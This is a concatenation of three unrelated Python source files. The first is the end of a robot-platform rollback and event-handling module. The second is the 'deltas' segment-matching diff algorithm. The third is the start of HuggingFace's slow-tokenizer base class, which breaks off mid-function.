else:
cmd[ServiceLauncher.SL_PACKAGE_KEY] = sli[0]
cmd[ServiceLauncher.SL_F_LAUNCHER_KEY] = sli[1]
s_launcher.stop(cmd)
self._logger.debug("-- TMP -- %s stopped" % cmd)
# once stopped the service logic items (nodes and launchers) we have to delete the service space
ss_pi_type_target = execute_int_robotics_data_query(self.get_sl_ss_pi_type_target, params,
"Unable to get the service space target from "
"service logic of '%s'" % params[self.PI_R_NAME_KEY])
if ss_pi_type_target:
self._logger.debug("Rollback update has to delete the service space on %s" % ss_pi_type_target)
result = self.delete_all_of_ss(ss_name, s_space)
if not result.is_ok():
self._logger.debug("-- TMP -- Forcing service space deletion")
# if the cleaning in the right way failed we force the robotics data cleaning
# and aspect that the unreachable platform node would clean himself
execute_int_robotics_data_query(self.delete_ss, ss_name,
"Unable to delete the service space '%s'" % ss_name)
def get_conn(self, rdm, params):
if self.PI_R_NAME_KEY in params:
row = rdm.get_connection_from_connection_pi_r(params[self.PI_R_NAME_KEY])
else:
# if self.PI_S_NAME_KEY in params
row = rdm.get_connection_from_connection_pi_s(params[self.PI_S_NAME_KEY])
# in case of PI_R_NAME_KEY row is a single tuple instead in all the other cases
# (meaning when PI_S_NAME_KEY is available) row will be a list of tuple
return row
def get_ss_name_from_conn(self, rdm, params):
row = rdm.get_ss_name_from_connection(params[self.PI_S_NAME_KEY], params[self.PI_R_NAME_KEY])
return row[0] if row and row[0] else None
def get_sl_pi_target(self, rdm, params):
row = rdm.get_pi_r_sl_from_connection_pi_r(params[self.PI_R_NAME_KEY])
return row
def delete_ss(self, rdm, ss_name):
rdm.delete_service_space_from_name(ss_name)
def delete_conn(self, rdm, params):
rdm.delete_connection(params[self.PI_R_NAME_KEY])
def delete_all_of_ss(self, ss_name, s_space):
from rcmp_robotics_data import execute_int_robotics_data_query
ss_info = execute_int_robotics_data_query(self.get_ss_info, ss_name,
"Unable to get the service spaces info of %s" % ss_name)
if ss_info:
from rcmp_command import DELETE_L_SERVICE_SPACE, DELETE_SERVICE_SPACE, RCMPCommandHandler
from rcmp_service_command import ServiceSpace
cmd = {RCMPCommandHandler.COMMAND_KEY: DELETE_L_SERVICE_SPACE,
PNodeInstance.I_ADDRESS_KEY: self.pni[RCMPlatformNode.PNI_ADDRESS],
ServiceSpace.SS_ADDRESS_KEY: ss_info[0],
ServiceSpace.SS_PORT_KEY: str(ss_info[1])}
result = s_space.delete_local(cmd)
else:
result = RCMPMessage()
result.create_error_response("Not enough info to delete services of '%s'" % ss_name)
return result
def roll_pi_back(self, pi_name):
# for robots we roll back half while for servers we roll back fully
from rcmp_command import ROLLBACK_PROVISIONING_PNODE_INSTANCE, RCMPCommandHandler
from rcmp_platform_command import PNodeInstance as PNodeI
cmd = {RCMPCommandHandler.COMMAND_KEY: ROLLBACK_PROVISIONING_PNODE_INSTANCE,
PNodeI.I_ADDRESS_KEY: self.pni[RCMPlatformNode.PNI_ADDRESS],
PNodeI.PI_NAME_KEY: pi_name}
p_node = PNodeI(self.pni, self.wdm)
p_node.rollback_provisioning(cmd)
def clean_up(self, params, s_space):
# we cannot reach params[self.PI_NAME_KEY] because is the platform node that results
# unreachable so we cannot do the right delete and we have to locally delete the remaining
# services associated with that node
from rcmp_robotics_data import execute_int_robotics_data_query
self._logger.debug("-- TMP -- Clean_up with params: %s" % params)
rows = execute_int_robotics_data_query(self.get_ss_list, params,
"Unable to get the service spaces of %s" %
params[self.PI_S_NAME_KEY]
if params[self.PI_REACHABLE_KEY] == RCMPlatformNode.R_TYPE
else params[self.PI_R_NAME_KEY])
if rows:
self._logger.debug("-- TMP -- Service space missed in the rollback service logic")
for row in rows:
if row:
self.delete_all_of_ss(row[0], s_space)
# at the end we do the rollback provisioning for the disconnected platform node instance
self.roll_pi_back(params[self.PI_S_NAME_KEY]
if params[self.PI_REACHABLE_KEY] == RCMPlatformNode.R_TYPE
else params[self.PI_R_NAME_KEY])
def get_ss_list(self, rdm, params):
return rdm.get_service_space_list_from_pi(params[self.PI_S_NAME_KEY]
if params[self.PI_REACHABLE_KEY] == RCMPlatformNode.R_TYPE
else params[self.PI_R_NAME_KEY])
def get_ss_info(self, rdm, ss_name):
return rdm.get_ss_ip_address_port(ss_name)
# --- ROLLBACK UPDATE ALL ---
def target_on_rollback_update_all(self, params):
# the platform node target of a rollback update all is always the master
# the all version means that we have to rollback all the update between
# we are rolling back all the update of the master platform node, so we take the
# name of the current platform node and use it to have the connections associated
# with it
params[self.PI_S_NAME_KEY] = self.pni[RCMPlatformNode.PNI_NAME]
params[self.PI_REACHABLE_KEY] = self.pni[RCMPlatformNode.PNI_TYPE]
threading.Thread(target=self.execute_rollback_update_all, args=(params, )).start()
reason = "Rollback update all ack"
result = RCMPMessage()
result.create_ok_response(reason)
return result
def execute_rollback_update_all(self, params):
from rcmp_service_command import ServiceSpace
self.execute_rollback_update(params)
s_space = ServiceSpace(self.pni, self.msm)
self.clean_up_all(params, s_space)
self._logger.debug("-- TMP -- After clean_up")
def clean_up_all(self, params, s_space):
# this is to clean up all there is on the master that is not in the connection context
from rcmp_robotics_data import execute_int_robotics_data_query
self._logger.debug("-- TMP -- Clean_up_all with params: %s" % params)
# we take all the service spaces
rows = execute_int_robotics_data_query(self.get_ss_list_all,
err_reason="Unable to get the remaining service spaces")
if rows:
for row in rows:
if row:
self.delete_all_of_ss(row[0], s_space)
# at the end we do the rollback provisioning for all the platform node instances except the master
rows = execute_int_robotics_data_query(self.get_pi_list_all,
err_reason="Unable to get the remaining platform instances")
if rows:
for row in rows:
if row:
# self.roll_pi_back(row[0], row[1])
# for robots we roll back half while for servers we roll back fully
self.roll_pi_back(row[0])
def get_ss_list_all(self, rdm):
return rdm.get_all_service_space_names()
def get_pi_list_all(self, rdm):
return rdm.get_platform_instance_list(full=True, exclude_master=True)
# --- STOP WD ---
def target_on_stop_wd(self, params):
# the platform node target of a clean up is always the master
threading.Thread(target=self.wdm.delete_watchdog, args=(params, )).start()
reason = "Stop wd ack"
result = RCMPMessage()
result.create_ok_response(reason)
return result
# --- STOP WD ---
def target_on_stop_all_wd(self, params):
# the platform node target of a clean up is always the master
threading.Thread(target=self.wdm.delete_all_watchdogs).start()
reason = "Stop all wd ack"
result = RCMPMessage()
result.create_ok_response(reason)
return result
class RCMPEventHandler:
"""The handler of rcm platform events."""
EVENT_KEY = "event"
def __init__(self, pni=None, wdm=None, msm=None):
self.pni = pni
self.wdm = wdm
self.msm = msm
def handle(self, params):
"""Delegate a sub component to handle the event."""
result = RCMPMessage()
event = params[self.EVENT_KEY]
# events about instances
p_node_instance = PNodeInstance(self.pni, self.wdm, self.msm)
if event == PAIRING_EVENT:
result = p_node_instance.pairing(params)
elif event == UPDATE_EVENT:
result = p_node_instance.update(params)
elif event == PAIRED_EVENT:
result = p_node_instance.paired(params)
elif event == ROLLBACK_UPDATE_EVENT:
result = p_node_instance.rollback_update(params)
elif event == ROLLBACK_UPDATE_ALL_EVENT:
result = p_node_instance.rollback_update_all(params)
elif event == STOP_WD_EVENT:
result = p_node_instance.stop_wd(params)
elif event == STOP_ALL_WD_EVENT:
result = p_node_instance.stop_all_wd(params)
else:
reason = "The event '%s' does not exist" % event
result.create_error_response(reason)
return result
| |
"""
Performs a diffs using a tree of matchable segments in order to remain robust
to content moves. This module supports the use of a custom
:class:`~deltas.Segmenter`.
.. autofunction:: deltas.algorithms.segment_matcher.diff
.. autofunction:: deltas.algorithms.segment_matcher.diff_segments
.. autofunction:: deltas.algorithms.segment_matcher.process
.. autoclass:: deltas.SegmentMatcher
:members:
"""
from collections import defaultdict
from . import sequence_matcher
from ..operations import Delete, Equal, Insert
from ..segmenters import (MatchableSegment, ParagraphsSentencesAndWhitespace,
Segment, Segmenter)
from ..tokenizers import Token, Tokenizer, text_split
from .diff_engine import DiffEngine
SEGMENTER = ParagraphsSentencesAndWhitespace()
TOKENIZER = text_split
def diff(a, b, segmenter=None):
"""
Performs a diff comparison between two sequences of tokens (`a` and `b`)
using `segmenter` to cluster and match
:class:`deltas.MatchableSegment`.
:Example:
>>> from deltas import segment_matcher, text_split
>>>
>>> a = text_split.tokenize("This is some text. This is some other text.")
>>> b = text_split.tokenize("This is some other text. This is some text.")
>>> operations = segment_matcher.diff(a, b)
>>>
>>> for op in operations:
... print(op.name, repr(''.join(a[op.a1:op.a2])),
... repr(''.join(b[op.b1:op.b2])))
...
equal 'This is some other text.' 'This is some other text.'
insert '' ' '
equal 'This is some text.' 'This is some text.'
delete ' ' ''
:Parameters:
a : `list`(:class:`deltas.tokenizers.Token`)
Initial sequence
b : `list`(:class:`deltas.tokenizers.Token`)
Changed sequence
segmenter : :class:`deltas.Segmenter`
A segmenter to use on the tokens.
:Returns:
An `iterable` of operations.
"""
a, b = list(a), list(b)
segmenter = segmenter or SEGMENTER
# Cluster the input tokens
a_segments = segmenter.segment(a)
b_segments = segmenter.segment(b)
return diff_segments(a_segments, b_segments)
def diff_segments(a_segments, b_segments):
"""
Performs a diff comparison between two pre-clustered
:class:`deltas.Segment` trees. In most cases, segmentation
takes 100X more time than actually performing the diff.
:Parameters:
a_segments : :class:`deltas.Segment`
An initial sequence
b_segments : :class:`deltas.Segment`
A changed sequence
:Returns:
An `iterable` of operations.
"""
# Match and re-sequence unmatched tokens
a_segment_tokens, b_segment_tokens = _cluster_matching_segments(a_segments,
b_segments)
# Perform a simple LCS over unmatched tokens and clusters
clustered_ops = sequence_matcher.diff(a_segment_tokens, b_segment_tokens)
# Return the expanded (de-clustered) operations
return (op for op in SegmentOperationsExpander(clustered_ops,
a_segment_tokens,
b_segment_tokens).expand())
def process(texts, *args, **kwargs):
"""
Processes a single sequence of texts with a
:class:`~deltas.SegmentMatcher`.
:Parameters:
texts : `iterable`(`str`)
sequence of texts
args : `tuple`
passed to :class:`~deltas.SegmentMatcher`'s
constructor
kwaths : `dict`
passed to :class:`~deltas.SegmentMatcher`'s
constructor
"""
processor = SegmentMatcher.Processor(*args, **kwargs)
for text in texts:
yield processor.process(text)
class SegmentMatcher(DiffEngine):
"""
Constructs a segment matcher diff engine that preserves segmentation state
and is able to process changes sequentially. When detecting changes
across many versions of a text this strategy will be about twice as fast as
calling :func:`diff` sequentially.
:Example:
>>> from deltas import SegmentMatcher
>>> from deltas import text_split
>>>
>>> engine = SegmentMatcher(text_split)
>>>
>>> processor = engine.processor()
>>> ops, a, b = processor.process("This is a version. It has some " +
... "text in it.")
>>> print(" ".join(repr(''.join(b[op.b1:op.b2])) for op in ops))
'This is a version. It has some text in it.'
>>> ops, a, b = processor.process("This is a version. However, it " +
... "has different.")
>>> print(" ".join(repr(''.join(b[op.b1:op.b2])) for op in ops))
'This is a version. ' '' 'However, it' ' has ' '' 'different' '.'
>>> ops, a, b = processor.process("Switching it up here. This is a " +
... "version.")
>>> print(" ".join(repr(''.join(b[op.b1:op.b2])) for op in ops))
'' 'Switching' ' it ' '' 'up' ' ' '' 'here' '.' ' ' 'This is a version.'
""" # noqa
class Processor(DiffEngine.Processor):
"""
A processor used by the SegmentMatcher difference engine to track the
history of a single text.
"""
def __init__(self, tokenizer=None, segmenter=None, last_text=None,
last_tokens=None, last_segments=None):
self.tokenizer = tokenizer or TOKENIZER
self.segmenter = segmenter or SEGMENTER
self.update(last_text, last_tokens, last_segments)
def update(self, last_text=None, last_tokens=None, last_segments=None):
if last_segments is not None:
self.last_segments = last_segments
self.last_tokens = self.last_segments.tokens()
elif last_tokens is not None:
self.last_tokens = last_tokens
self.last_segments = self.segmenter.segment(last_tokens)
elif last_text is not None:
self.last_tokens = self.tokenizer.tokenize(last_text)
self.last_segments = self.segmenter.segment(self.last_tokens)
else:
self.last_tokens = []
self.last_segments = Segment()
def process(self, text, token_class=Token):
"""
Processes a new version of a text and returns the delta.
:Parameters:
text : `str`
The text to process
:Returns:
A tuple of `operations`, `a_tokens`, `b_tokens`
"""
# Tokenize and segment
tokens = self.tokenizer.tokenize(text, token_class=token_class)
segments = self.segmenter.segment(tokens)
return self.process_segments(segments, tokens=tokens)
def process_segments(self, segments, tokens=None):
if tokens is None:
tokens = segments.tokens()
# Perform diff
_clear_matches(self.last_segments)
operations = diff_segments(self.last_segments, segments)
# Update state
a = self.last_tokens
b = tokens
self.last_tokens = tokens
self.last_segments = segments
# Return delta
return operations, a, b
def __init__(self, tokenizer=None, segmenter=None):
self.tokenizer = tokenizer or TOKENIZER
self.segmenter = segmenter or SEGMENTER
def processor(self, *args, **kwargs):
"""
Constructs and configures a processor to process versions of a text.
"""
return self.Processor(self.tokenizer, self.segmenter, *args, **kwargs)
def process(self, texts, *args, **kwargs):
return process(texts, self.tokenizer, self.segmenter, *args, **kwargs)
@classmethod
def from_config(cls, config, name, section_key="diff_engines"):
section = config[section_key][name]
return cls(
Tokenizer.from_config(config, section['tokenizer']),
Segmenter.from_config(config, section['segmenter'])
)
def _cluster_matching_segments(a_segments, b_segments):
# Generate a look-up map for matchable segments in 'a'
a_segment_map = _build_segment_map(a_segments)
# Find and cluster matching content in 'b'
b_segment_tokens = list(_match_segments(a_segment_map, b_segments))
# Expand unmatched segments from 'a'
a_segment_tokens = list(_expand_unmatched_segments(a_segments))
return a_segment_tokens, b_segment_tokens
def _build_segment_map(segments):
d = defaultdict(list)
for matchable_segment in _get_matchable_segments(segments):
d[matchable_segment].append(matchable_segment)
return d
def _get_matchable_segments(segments):
"""
Performs a depth-first search of the segment tree to get all matchable
segments.
"""
for subsegment in segments:
if isinstance(subsegment, Token):
break # No tokens allowed next to segments
if isinstance(subsegment, Segment):
if isinstance(subsegment, MatchableSegment):
yield subsegment
for matchable_subsegment in _get_matchable_segments(subsegment):
yield matchable_subsegment
def _match_segments(a_segment_map, b_segments):
for subsegment in b_segments:
if isinstance(subsegment, Segment):
if isinstance(subsegment, MatchableSegment) and \
subsegment in a_segment_map:
matched_segments = a_segment_map[subsegment] # Get matches
for matched_segment in matched_segments: # For each match
matched_segment.match = subsegment # flag as matched
subsegment.match = matched_segments[0] # first match
yield subsegment # Dump matched segment
else:
for seg_or_tok in _match_segments(a_segment_map, subsegment):
yield seg_or_tok # Recurse
else:
yield subsegment # Dump token
def _expand_unmatched_segments(a_segments):
for subsegment in a_segments:
# Check if a segment is matched.
if isinstance(subsegment, Segment):
if isinstance(subsegment, MatchableSegment) and \
subsegment.match is not None:
yield subsegment # Yield matched segment as cluster
else:
for seg_or_tok in _expand_unmatched_segments(subsegment):
yield seg_or_tok # Recurse
else:
yield subsegment # Dump token
def _clear_matches(segment):
if isinstance(segment, MatchableSegment):
segment.match = None
if isinstance(segment, Segment):
# Recurse!
for subsegment in segment:
_clear_matches(subsegment)
class SegmentOperationsExpander:
def __init__(self, operations, a_token_segments, b_token_segments):
self.a_pos = 0
self.b_pos = 0
self.a_token_segments = a_token_segments
self.b_token_segments = b_token_segments
self.operations = operations
def expand(self):
for operation in self.operations:
if isinstance(operation, Equal):
# print(
# "Processing equal: {0} {1}".format(self.a_pos, self.b_pos))
expanded_operations = self._process_equal(operation)
elif isinstance(operation, Insert):
# print(
# "Processing insert: {0} {1}".format(self.a_pos, self.b_pos))
expanded_operations = self._process_insert(operation)
elif isinstance(operation, Delete):
# print(
# "Processing remove: {0} {1}".format(self.a_pos, self.b_pos))
expanded_operations = self._process_delete(operation)
else:
assert False, "Should never happen"
for operation in expanded_operations:
yield operation
def _process_equal(self, op):
a1 = self.a_pos
b1 = self.b_pos
token_len = sum(1 for t_s in self.a_token_segments[op.a1:op.a2]
for _ in t_s.tokens())
self.a_pos += token_len
self.b_pos += token_len
yield Equal(a1, self.a_pos, b1, self.b_pos)
def _process_insert(self, op):
inserted_token_count = 0
for t_s in self.b_token_segments[op.b1:op.b2]:
if isinstance(t_s, Token):
inserted_token_count += 1
else: # Found a matched segment
segment = t_s
# First, emit an insert for the tokens we have seen so far
if inserted_token_count > 0:
b1 = self.b_pos
self.b_pos += inserted_token_count
yield Insert(self.a_pos, self.a_pos, b1, self.b_pos)
inserted_token_count = 0
# Now, emit an Equal for the matched segment
b1 = self.b_pos
self.b_pos += sum(1 for _ in segment.tokens())
yield Equal(segment.match.start, segment.match.end,
b1, self.b_pos)
# Cleanup! Make sure we emit any remaining inserted tokens.
if inserted_token_count > 0:
b1 = self.b_pos
self.b_pos += inserted_token_count
yield Insert(self.a_pos, self.a_pos, b1, self.b_pos)
inserted_token_count = 0
def _process_delete(self, op):
removed_token_count = 0
for t_s in self.a_token_segments[op.a1:op.a2]:
if isinstance(t_s, Token):
removed_token_count += 1
else: # Found a matched token... not removed -- just moved
segment = t_s
if removed_token_count > 0:
a1 = self.a_pos
self.a_pos += removed_token_count
yield Delete(a1, self.a_pos, self.b_pos, self.b_pos)
removed_token_count = 0
# update & reset!
self.a_pos += sum(1 for _ in segment.tokens())
# cleanup
if removed_token_count > 0:
a1 = self.a_pos
self.a_pos += removed_token_count
yield Delete(a1, self.a_pos, self.b_pos, self.b_pos)
| |
# coding=utf-8
# Copyright 2020 The HuggingFace Inc. team.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Tokenization classes for python tokenizers. For fast tokenizers (provided by HuggingFace's tokenizers library) see
tokenization_utils_fast.py
"""
import bisect
import itertools
import re
import unicodedata
from typing import Any, Dict, List, Optional, Tuple, Union, overload
from .file_utils import PaddingStrategy, TensorType, add_end_docstrings
from .tokenization_utils_base import (
ENCODE_KWARGS_DOCSTRING,
ENCODE_PLUS_ADDITIONAL_KWARGS_DOCSTRING,
INIT_TOKENIZER_DOCSTRING,
AddedToken,
BatchEncoding,
EncodedInput,
EncodedInputPair,
PreTokenizedInput,
PreTokenizedInputPair,
PreTrainedTokenizerBase,
TextInput,
TextInputPair,
TruncationStrategy,
)
from .utils import logging
logger = logging.get_logger(__name__)
# Slow tokenizers are saved in a vocabulary plus three separated files
SPECIAL_TOKENS_MAP_FILE = "special_tokens_map.json"
ADDED_TOKENS_FILE = "added_tokens.json"
TOKENIZER_CONFIG_FILE = "tokenizer_config.json"
def _is_whitespace(char):
"""Checks whether `char` is a whitespace character."""
# \t, \n, and \r are technically control characters but we treat them
# as whitespace since they are generally considered as such.
if char == " " or char == "\t" or char == "\n" or char == "\r":
return True
cat = unicodedata.category(char)
if cat == "Zs":
return True
return False
def _is_control(char):
"""Checks whether `char` is a control character."""
# These are technically control characters but we count them as whitespace
# characters.
if char == "\t" or char == "\n" or char == "\r":
return False
cat = unicodedata.category(char)
if cat.startswith("C"):
return True
return False
def _is_punctuation(char):
"""Checks whether `char` is a punctuation character."""
cp = ord(char)
# We treat all non-letter/number ASCII as punctuation.
# Characters such as "^", "$", and "`" are not in the Unicode
# Punctuation class but we treat them as punctuation anyways, for
# consistency.
if (cp >= 33 and cp <= 47) or (cp >= 58 and cp <= 64) or (cp >= 91 and cp <= 96) or (cp >= 123 and cp <= 126):
return True
cat = unicodedata.category(char)
if cat.startswith("P"):
return True
return False
def _is_end_of_word(text):
"""Checks whether the last character in text is one of a punctuation, control or whitespace character."""
last_char = text[-1]
return bool(_is_control(last_char) | _is_punctuation(last_char) | _is_whitespace(last_char))
def _is_start_of_word(text):
"""Checks whether the first character in text is one of a punctuation, control or whitespace character."""
first_char = text[0]
return bool(_is_control(first_char) | _is_punctuation(first_char) | _is_whitespace(first_char))
def _insert_one_token_to_ordered_list(token_list: List[str], new_token: str):
"""
Inserts one token to an ordered list if it does not already exist. Note: token_list must be sorted.
"""
insertion_idx = bisect.bisect_left(token_list, new_token)
# Checks if new_token is already in the ordered token_list
if insertion_idx < len(token_list) and token_list[insertion_idx] == new_token:
# new_token is in token_list, don't add
return
else:
token_list.insert(insertion_idx, new_token)
@add_end_docstrings(INIT_TOKENIZER_DOCSTRING)
class PreTrainedTokenizer(PreTrainedTokenizerBase):
"""
Base class for all slow tokenizers.
Inherits from :class:`~transformers.tokenization_utils_base.PreTrainedTokenizerBase`.
Handle all the shared methods for tokenization and special tokens as well as methods downloading/caching/loading
pretrained tokenizers as well as adding tokens to the vocabulary.
This class also contain the added tokens in a unified way on top of all tokenizers so we don't have to handle the
specific vocabulary augmentation methods of the various underlying dictionary structures (BPE, sentencepiece...).
"""
def __init__(self, **kwargs):
super().__init__(**kwargs)
# Added tokens - We store this for both slow and fast tokenizers
# until the serialization of Fast tokenizers is updated
self.added_tokens_encoder: Dict[str, int] = {}
self.added_tokens_decoder: Dict[int, str] = {}
self.unique_no_split_tokens: List[str] = []
self._decode_use_source_tokenizer = False
@property
def is_fast(self) -> bool:
return False
@property
def vocab_size(self) -> int:
"""
:obj:`int`: Size of the base vocabulary (without the added tokens).
"""
raise NotImplementedError
def get_added_vocab(self) -> Dict[str, int]:
"""
Returns the added tokens in the vocabulary as a dictionary of token to index.
Returns:
:obj:`Dict[str, int]`: The added tokens.
"""
return self.added_tokens_encoder
def __len__(self):
"""
Size of the full vocabulary with the added tokens.
"""
return self.vocab_size + len(self.added_tokens_encoder)
def _add_tokens(self, new_tokens: Union[List[str], List[AddedToken]], special_tokens: bool = False) -> int:
"""
Add a list of new tokens to the tokenizer class. If the new tokens are not in the vocabulary, they are added to
it with indices starting from length of the current vocabulary.
Args:
new_tokens (:obj:`List[str]`or :obj:`List[tokenizers.AddedToken]`):
Token(s) to add in vocabulary. A token is only added if it's not already in the vocabulary (tested by
checking if the tokenizer assign the index of the ``unk_token`` to them).
special_tokens (:obj:`bool`, `optional`, defaults to :obj:`False`):
Whether or not the tokens should be added as special tokens.
Returns:
:obj:`int`: The number of tokens actually added to the vocabulary.
Examples::
# Let's see how to increase the vocabulary of Bert model and tokenizer
tokenizer = BertTokenizer.from_pretrained('bert-base-uncased')
model = BertModel.from_pretrained('bert-base-uncased')
num_added_toks = tokenizer.add_tokens(['new_tok1', 'my_new-tok2'])
print('We have added', num_added_toks, 'tokens')
# Note: resize_token_embeddings expects to receive the full size of the new vocabulary, i.e. the length of the tokenizer.
model.resize_token_embeddings(len(tokenizer))
"""
new_tokens = [str(tok) for tok in new_tokens]
tokens_to_add = []
for token in new_tokens:
assert isinstance(token, str)
if not special_tokens and hasattr(self, "do_lower_case") and self.do_lower_case:
token = token.lower()
if (
token != self.unk_token
and self.convert_tokens_to_ids(token) == self.convert_tokens_to_ids(self.unk_token)
and token not in tokens_to_add
):
tokens_to_add.append(token)
if self.verbose:
logger.info(f"Adding {token} to the vocabulary")
added_tok_encoder = dict((tok, len(self) + i) for i, tok in enumerate(tokens_to_add))
added_tok_decoder = {v: k for k, v in added_tok_encoder.items()}
self.added_tokens_encoder.update(added_tok_encoder)
self.added_tokens_decoder.update(added_tok_decoder)
# Make sure we don't split on any special tokens (even they were already in the vocab before e.g. for Albert)
if special_tokens:
if len(new_tokens) == 1:
_insert_one_token_to_ordered_list(self.unique_no_split_tokens, new_tokens[0])
else:
self.unique_no_split_tokens = sorted(set(self.unique_no_split_tokens).union(set(new_tokens)))
else:
# Or on the newly added tokens
if len(tokens_to_add) == 1:
_insert_one_token_to_ordered_list(self.unique_no_split_tokens, tokens_to_add[0])
else:
self.unique_no_split_tokens = sorted(set(self.unique_no_split_tokens).union(set(tokens_to_add)))
return len(tokens_to_add)
def num_special_tokens_to_add(self, pair: bool = False) -> int:
"""
Returns the number of added tokens when encoding a sequence with special tokens.
.. note::
This encodes a dummy input and checks the number of added tokens, and is therefore not efficient. Do not
put this inside your training loop.
Args:
pair (:obj:`bool`, `optional`, defaults to :obj:`False`):
Whether the number of added tokens should be computed in the case of a sequence pair or a single
sequence.
Returns:
:obj:`int`: Number of special tokens added to sequences.
"""
token_ids_0 = []
token_ids_1 = []
return len(self.build_inputs_with_special_tokens(token_ids_0, token_ids_1 if pair else None))
def tokenize(self, text: TextInput, **kwargs) -> List[str]:
"""
Converts a string in a sequence of tokens, using the tokenizer.
Split in words for word-based vocabulary or sub-words for sub-word-based vocabularies
(BPE/SentencePieces/WordPieces). Takes care of added tokens.
Args:
text (:obj:`str`):
The sequence to be encoded.
**kwargs (additional keyword arguments):
Passed along to the model-specific ``prepare_for_tokenization`` preprocessing method.
Returns:
:obj:`List[str]`: The list of tokens.
"""
# Simple mapping string => AddedToken for special tokens with specific tokenization behaviors
all_special_tokens_extended = dict(
(str(t), t) for t in self.all_special_tokens_extended if isinstance(t, AddedToken)
)
text, kwargs = self.prepare_for_tokenization(text, **kwargs)
if kwargs:
logger.warning(f"Keyword arguments {kwargs} not recognized.")
# TODO: should this be in the base class?
if hasattr(self, "do_lower_case") and self.do_lower_case:
# convert non-special tokens to lowercase
escaped_special_toks = [re.escape(s_tok) for s_tok in self.all_special_tokens]
pattern = r"(" + r"|".join(escaped_special_toks) + r")|" + r"(.+?)"
text = re.sub(pattern, lambda m: m.groups()[0] or m.groups()[1].lower(), text)
def split_on_token(tok, text):
result = []
tok_extended = all_special_tokens_extended.get(tok, None)
split_text = text.split(tok)
full_word = ""
for i, sub_text in enumerate(split_text):
# AddedToken can control whitespace stripping around them.
# We use them for GPT2 and Roberta to have different behavior depending on the special token
# Cf. https://github.com/huggingface/transformers/pull/2778
# and https://github.com/huggingface/transformers/issues/3788
if isinstance(tok_extended, AddedToken):
if tok_extended.single_word:
# Try to avoid splitting on token
if (
i < len(split_text) - 1
and not _is_end_of_word(sub_text)
and not _is_start_of_word(split_text[i + 1])
):
# Don't extract the special token
full_word += sub_text + tok
elif full_word:
full_word += sub_text
result.append(full_word)
full_word = ""
continue
# Strip white spaces on the right
if tok_extended.rstrip and i > 0:
# A bit counter-intuitive but we strip the left of the string
# since tok_extended.rstrip means the special token is eating all white spaces on its right
sub_text = sub_text.lstrip()
# Strip white spaces on the left
if tok_extended.lstrip and i < len(split_text) - 1:
sub_text = sub_text.rstrip() # Opposite here
else:
# We strip left and right by default
if i < len(split_text) - 1:
sub_text = sub_text.rstrip()
if i > 0:
sub_text = sub_text.lstrip()
if i == 0 and not sub_text:
result.append(tok)
elif i == len(split_text) - 1:
if sub_text:
result.append(sub_text)
else:
pass
else:
if sub_text:
result.append(sub_text)
result.append(tok)
return result
def split_on_tokens(tok_list, text):
if not text.strip():
return []
if not tok_list:
return self._tokenize(text)
tokenized_text = []
text_list = [text]
for tok in tok_list:
tokenized_text = []
for sub_text in text_list:
if sub_text not in self.unique_no_split_tokens:
tokenized_text.extend(split_on_token(tok, sub_text))
else:
tokenized_text.append(sub_text)
text_list = tokenized_text
return list(
itertools.chain.from_iterable(
(
self._tokenize(token) if token not in self.unique_no_split_tokens else [token]
for token in tokenized_text
)
)
)
no_split_token = self.unique_no_split_tokens
tokenized_text = split_on_tokens(no_split_token, text)
return tokenized_text
def _tokenize(self, text, **kwargs):
"""
Converts a string in a sequence of tokens (string), using the tokenizer. Split in words for word-based
vocabulary or sub-words for sub-word-based vocabularies (BPE/SentencePieces/WordPieces).
Do NOT take care of added tokens.
"""
raise NotImplementedError
def convert_tokens_to_ids(self, tokens: Union[str, List[str]]) -> Union[int, List[int]]:
"""
Converts a token string (or a sequence of tokens) in a single integer id (or a sequence of ids), using the
vocabulary.
Args:
tokens (:obj:`str` or :obj:`List[str]`): One or several token(s) to convert to token id(s).
Returns:
:obj:`int` or :obj:`List[int]`: The token id or list of token ids.
"""
if tokens is None:
return None
if isinstance(tokens, str):
return self._convert_token_to_id_with_added_voc(tokens)
ids = []
for token in tokens:
ids.append(self._convert_token_to_id_with_added_voc(token))
return ids
def _convert_token_to_id_with_added_voc(self, token):
if token is None:
return None
if token in self.added_tokens_encoder:
return self.added_tokens_encoder[token]
return self._convert_token_to_id(token)
def _convert_token_to_id(self, token):
raise NotImplementedError
def _encode_plus(
self,
text: Union[TextInput, PreTokenizedInput, EncodedInput],
text_pair: Optional[Union[TextInput, PreTokenizedInput, EncodedInput]] = None,
add_special_tokens: bool = True,
padding_strategy: PaddingStrategy = PaddingStrategy.DO_NOT_PAD,
truncation_strategy: TruncationStrategy = TruncationStrategy.DO_NOT_TRUNCATE,
max_length: Optional[int] = None,
stride: int = 0,
is_split_into_words: bool = False,
pad_to_multiple_of: Optional[int] = None,
return_tensors: Optional[Union[str, TensorType]] = None,
return_token_type_ids: Optional[bool] = None,
return_attention_mask: Optional[bool] = None,
return_overflowing_tokens: bool = False,
return_special_tokens_mask: bool = False,
return_offsets_mapping: bool = False,
return_length: bool = False,
verbose: bool = True,
**kwargs
) -> BatchEncoding:
def get_input_ids(text):
if isinstance(text, str):
tokens = self.tokenize(text, **kwargs)
return self.convert_tokens_to_ids(tokens)
elif isinstance(text, (list, tuple)) and len(text) > 0 and isinstance(text[0], str):
if is_split_into_words:
tokens = list(
itertools.chain(*(self.tokenize(t, is_split_into_words=True, **kwargs) for t in text))
)
return self.convert_tokens_to_ids(tokens)
else:
return self.convert_tokens_to_ids(text)
elif isinstance(text, (list, tuple)) and len(text) > 0 and isinstance(text[0], int):
return text
else:
if is_split_into_words:
raise ValueError(
f"Input {text} is not valid. Should be a string or a list/tuple of strings when `is_split_into_words=True`."
)
else:
raise ValueError(
f"Input {text} is not valid. Should be a string, a list/tuple of strings or a list/tuple of integers."
)
if return_offsets_mapping:
raise NotImplementedError(
"return_offset_mapping is not available when using Python tokenizers."
"To use this feature, change your tokenizer to one deriving from "
"transformers.PreTrainedTokenizerFast."
"More information on available tokenizers at "
"https://github.com/huggingface/transformers/pull/2674"
)
first_ids = get_input_ids(text)
second_ids = get_input_ids(text_pair) if text_pair is not None else None
return self.prepare_for_model(
first_ids,
pair_ids=second_ids,
add_special_tokens=add_special_tokens,
padding=padding_strategy.value,
